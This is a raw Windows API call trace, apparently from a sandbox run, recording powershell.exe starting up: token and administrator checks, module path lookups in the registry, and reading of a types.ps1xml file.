	[0669.157] GetVersionExW (in: lpVersionInformation=0xed9a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xed9a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0669.160] GetCurrentProcess () returned 0xffffffffffffffff
	[0669.161] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xeda38 | out: TokenHandle=0xeda38*=0x2e4) returned 1
	[0669.165] GetTokenInformation (in: TokenHandle=0x2e4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xed958 | out: TokenInformation=0x0, ReturnLength=0xed958) returned 0
	[0669.166] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1b7290
	[0669.166] GetTokenInformation (in: TokenHandle=0x2e4, TokenInformationClass=0x8, TokenInformation=0x1b7290, TokenInformationLength=0x4, ReturnLength=0xed958 | out: TokenInformation=0x1b7290, ReturnLength=0xed958) returned 1
	[0669.168] DuplicateTokenEx (in: hExistingToken=0x2e4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xedab8 | out: phNewToken=0xedab8*=0x2e0) returned 1
	[0669.168] GetTokenInformation (in: TokenHandle=0x2e4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xed958 | out: TokenInformation=0x0, ReturnLength=0xed958) returned 0
	[0669.169] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1b72c0
	[0669.169] GetTokenInformation (in: TokenHandle=0x2e4, TokenInformationClass=0x8, TokenInformation=0x1b72c0, TokenInformationLength=0x4, ReturnLength=0xed958 | out: TokenInformation=0x1b72c0, ReturnLength=0xed958) returned 1
	[0669.170] CheckTokenMembership (in: TokenHandle=0x2e0, SidToCheck=0x2d843e8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xedac8 | out: IsMember=0xedac8) returned 1
	[0669.170] CloseHandle (hObject=0x2e0) returned 1
	[0669.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0669.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0669.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0669.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0670.568] CoTaskMemAlloc (cb=0x804) returned 0x1b97ed60
	[0670.568] GetConsoleTitleW (in: lpConsoleTitle=0x1b97ed60, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0672.160] CoTaskMemFree (pv=0x1b97ed60) 
	[0672.176] CoTaskMemAlloc (cb=0x804) returned 0x1b97f610
	[0672.176] GetConsoleTitleW (in: lpConsoleTitle=0x1b97f610, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0672.177] CoTaskMemFree (pv=0x1b97f610) 
	[0672.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0672.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0672.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0672.179] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0678.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0678.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0678.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0678.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0680.117] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x300
	[0680.119] CoCreateGuid (in: pguid=0xedbb0 | out: pguid=0xedbb0*(Data1=0x9e78d45a, Data2=0xeef2, Data3=0x4ecc, Data4=([0]=0xa3, [1]=0x24, [2]=0x62, [3]=0x3e, [4]=0xb1, [5]=0x28, [6]=0x3f, [7]=0x5b))) returned 0x0
	[0680.121] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0680.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0680.121] CoTaskMemFree (pv=0x243180) 
	[0681.606] WinSqmIsOptedIn () returned 0x0
	[0681.607] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0681.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.608] CoTaskMemFree (pv=0x243180) 
	[0681.609] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0681.609] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.609] CoTaskMemFree (pv=0x243180) 
	[0681.610] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0681.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.610] CoTaskMemFree (pv=0x243180) 
	[0681.611] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0681.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.611] CoTaskMemFree (pv=0x243180) 
	[0681.611] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0681.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.611] CoTaskMemFree (pv=0x243180) 
	[0681.612] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0681.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.613] CoTaskMemFree (pv=0x243180) 
	[0681.613] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0681.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.614] CoTaskMemFree (pv=0x243180) 
	[0681.614] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0681.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.615] CoTaskMemFree (pv=0x243180) 
	[0681.617] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0681.617] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.617] CoTaskMemFree (pv=0x243180) 
	[0681.622] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0681.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.622] CoTaskMemFree (pv=0x243180) 
	[0681.622] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0681.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.622] CoTaskMemFree (pv=0x243180) 
	[0681.623] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0681.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.623] CoTaskMemFree (pv=0x243180) 
	[0691.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.464] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0691.464] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0691.464] CoTaskMemFree (pv=0x243180) 
	[0691.466] CoTaskMemAlloc (cb=0xcc) returned 0x260930
	[0691.466] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x260930, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0691.466] CoTaskMemFree (pv=0x260930) 
	[0691.466] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xed728 | out: phkResult=0xed728*=0x304) returned 0x0
	[0691.466] RegQueryValueExW (in: hKey=0x304, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed6ac, lpData=0x0, lpcbData=0xed6a8*=0x0 | out: lpType=0xed6ac*=0x2, lpData=0x0, lpcbData=0xed6a8*=0x6c) returned 0x0
	[0691.467] CoTaskMemAlloc (cb=0x70) returned 0x1f0560
	[0691.467] RegQueryValueExW (in: hKey=0x304, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed67c, lpData=0x1f0560, lpcbData=0xed678*=0x6c | out: lpType=0xed67c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xed678*=0x6c) returned 0x0
	[0691.467] CoTaskMemFree (pv=0x1f0560) 
	[0691.467] CoTaskMemAlloc (cb=0xcc) returned 0x260930
	[0691.467] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x260930, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0691.467] CoTaskMemFree (pv=0x260930) 
	[0691.467] CoTaskMemAlloc (cb=0xcc) returned 0x260930
	[0691.467] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x260930, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0691.467] CoTaskMemFree (pv=0x260930) 
	[0691.471] RegCloseKey (hKey=0x304) returned 0x0
	[0691.471] CoTaskMemAlloc (cb=0xcc) returned 0x260930
	[0691.471] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x260930, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0691.471] CoTaskMemFree (pv=0x260930) 
	[0691.471] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xed728 | out: phkResult=0xed728*=0x304) returned 0x0
	[0691.471] RegQueryValueExW (in: hKey=0x304, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed6ac, lpData=0x0, lpcbData=0xed6a8*=0x0 | out: lpType=0xed6ac*=0x0, lpData=0x0, lpcbData=0xed6a8*=0x0) returned 0x2
	[0691.471] RegCloseKey (hKey=0x304) returned 0x0
	[0693.160] CoTaskMemAlloc (cb=0x20c) returned 0x252240
	[0693.161] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x252240 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0693.162] CoTaskMemFree (pv=0x252240) 
	[0693.162] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0693.163] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0693.168] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0693.168] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.168] CoTaskMemFree (pv=0x243180) 
	[0693.170] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0693.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.170] CoTaskMemFree (pv=0x243180) 
	[0693.177] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0693.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.177] CoTaskMemFree (pv=0x243180) 
	[0693.177] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0693.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.177] CoTaskMemFree (pv=0x243180) 
	[0693.182] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed518 | out: phkResult=0xed518*=0x314) returned 0x0
	[0693.183] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0xed52c, lpData=0x0, lpcbData=0xed528*=0x0 | out: lpType=0xed52c*=0x1, lpData=0x0, lpcbData=0xed528*=0x74) returned 0x0
	[0693.183] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0xed49c, lpData=0x0, lpcbData=0xed498*=0x0 | out: lpType=0xed49c*=0x1, lpData=0x0, lpcbData=0xed498*=0x74) returned 0x0
	[0693.183] CoTaskMemAlloc (cb=0x78) returned 0x1f0560
	[0693.183] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0xed46c, lpData=0x1f0560, lpcbData=0xed468*=0x74 | out: lpType=0xed46c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xed468*=0x74) returned 0x0
	[0693.183] CoTaskMemFree (pv=0x1f0560) 
	[0693.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0693.183] SetErrorMode (uMode=0x1) returned 0x1
	[0693.183] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xed3f0 | out: lpFileInformation=0xed3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0693.184] SetErrorMode (uMode=0x1) returned 0x1
	[0693.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0693.184] SetErrorMode (uMode=0x1) returned 0x1
	[0693.184] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed3f0 | out: lpFileInformation=0xed3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0693.185] SetErrorMode (uMode=0x1) returned 0x1
	[0693.185] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0693.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.185] CoTaskMemFree (pv=0x243180) 
	[0693.186] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0693.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.186] CoTaskMemFree (pv=0x243180) 
	[0693.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0693.192] SetErrorMode (uMode=0x1) returned 0x1
	[0693.193] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0693.193] GetFileType (hFile=0x318) returned 0x1
	[0693.193] SetErrorMode (uMode=0x1) returned 0x1
	[0693.193] GetFileType (hFile=0x318) returned 0x1
	[0693.194] ReadFile (in: hFile=0x318, lpBuffer=0x2e108d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2e108d8*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0693.196] ReadFile (in: hFile=0x318, lpBuffer=0x2e108d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2e108d8*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
	[0693.196] ReadFile (in: hFile=0x318, lpBuffer=0x2e108d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed328, lpOverlapped=0x0 | out: lpBuffer=0x2e108d8*, lpNumberOfBytesRead=0xed328*=0x1000, lpOverlapped=0x0) returned 1
